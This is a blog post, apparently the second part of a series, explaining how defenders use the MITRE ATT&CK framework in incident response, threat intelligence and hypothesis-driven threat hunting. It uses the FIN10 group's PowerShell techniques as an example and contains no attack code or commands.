In the previous blog, we introduced the MITRE ATT&CK framework with its components, and we discussed how it could be leveraged efficiently to detect threats. Expanding from that, we are going, in this second part, to explore the other usages of this framework for blue teams: improving incident response, cyber threat intelligence and threat hunting. Let’s jump in !
After implementing and enabling the detection rules in production as, once a suspicious behavior is captured and an alert is triggered consequently, the incident response step takes center stage.
Here again, the MITRE framework could be used by analysts. In fact, having the detections mapped to the MITRE matrix will provide indication about which technique/sub-technique is being detected when an alert is triggered. This could be of great help to the analysts investigating the alerts since they could check the technique and read about its details in order to better understand the behavior that was captured.
Also, given the exhaustive nature of alerts that include a large set of fields, the mapping will aid in identifying what are the ones that are important to check in order to determine if the alert is a real incident or a false positive one.
Additionally, referencing the technique enables incident responders to contextualize the alert within a broader set of adversarial techniques, providing them insights about how far the attacker made it into the network and allowing them to do a primary assessment of the scope and impact of the attack, so that they can better prioritize their efforts and prevent further damage.
One of the important components of the incident handling activity are the Incident Response Playbooks, which provide specific actions that organizations should take in order to prepare for, respond to, and recover from incidents.
Usually, organizations define a specific playbook per incident type. These types might include: Malware, Phishing, Denial of Service, Insider Threat, Data Breach, etc.
However, some organizations prefer to have MITRE-based incident response playbooks which are specifically designed to align with the MITRE ATT&CK framework, meaning each playbook is designed to respond to a specific attack technique, aiming for a more targeted and specific approach, thereby enhancing the precision and effectiveness of the response efforts. An example of this kind of playbook could be found here.
Lastly, when choosing the IR playbooks approach (General or MITRE-based), it is important to take into consideration the complexity and the extensiveness of building MITRE based playbooks given the number of available techniques and the specificity of each one based on how adversaries operate in each.
Cyber threat intelligence revolves around being aware of the adversaries activities and using this knowledge to enhance the process of decision-making.
Sharing these information allows organizations to receive early warnings about emerging threats and vulnerabilities, allowing the learning from the experiences of others, thus, proactively detecting and mitigating potential risks before they become widespread.
In order for the exchange of information described above to be efficient, a common language should be used. And here comes the MITRE ATT&CK framework to the picture as it provides a common language and taxonomy for describing adversary behavior across the cyber kill chain, allowing security professionals to communicate effectively about threats, understand attacker methodologies, and prioritize defensive strategies.
Given the fact that MITRE ATT&CK Framework allows us to understand adversary behavior, it could play a pivotal role in assisting organizations during their cyber threat intelligence journey, regardless of their maturity level.
According to the MITRE team, in order to start using ATT&CK for threat intelligence, you simply need to go to the MITRE home page, enter in the search bar the industry name of your company, and you will get the attack groups targeting it. If we take the “Energy” sector, for example, we can see that OilRig, LAPSU$$ and menuPass are some of the threat groups targeting this industry as shown by the image below.
Next, you can check the techniques used by these groups, learn about them and share that knowledge with the teams responsible for creating detections and deploying mitigations.
If you already have the threat intelligence foundation discussed above, stepping up to the next level requires for you to map intelligence to ATT&CK yourself rather than relying on those already done by others.
For this purpose, internal data such as your organization’s incident reports could be used as well as external ones such as external blogs, reports from OSINT and threat intel subscriptions..
The MITRE ATT&CK team suggests the following steps in order to map a threat intelligence source to ATT&CK:
The resulting information should be aggregated to determine the techniques that are commonly used by multiple attack groups that are relevant to your organization. This result could be of great value to know what should be prioritized.
Threat hunting is the discipline that goes beyond passive defense mechanisms. It is a proactive approach that involves actively searching for signs of malicious activity within an organization’s systems and networks.
Its starting point is developing the hypothesis which is the malicious activity we assume is happening. The more clearly the later is defined the more effective the hunt will be.
One of the resources that could be used here is … yes you guessed it: MITRE ATT&CK framework.
Following the hypothesis-driven process model, the hunting team outlines a scenario of a potential attack, then determines what is the evidence that attackers might leave behind.
For this purpose the TTPs provided by MITRE presents a treasure trove to explore to create the hypothesis to start with, using the following questions: what are the techniques that are likely to be exploited? What are the procedures implemented for that technique? What are the expected traces that could be found in the logs? etc.
It also allows the hunters to scope their hunts to specific categories of behavior based on their environment and -for better efficiency- the adversary profiles and the high-impact tactics that could pose significant risk, based on the threat intelligence results.
For example, if FIN10 is one of the threat groups targeting your organization or your industry, you can check the techniques identified by MITRE ATT&CK that are commonly used by this group. You will find that these techniques include the use of PowerShell for Execution as well as PowerShell Empire to establish Persistence. As a threat hunter, you can use this knowledge to create hypotheses about malicious PowerShell and PowerShell Empire commands running on your systems. From there, you can begin the hunt.
As we explored in the two parts of this blog, the MITRE ATT&CK framework serves as a versatile and indispensable tool in today’s cybersecurity sphere, offering multifaceted applications across various domains, from threat detection to incident response, threat intelligence and threat hunting, thus, empowering defenders to stay ahead of adversaries in this the ever-changing field.
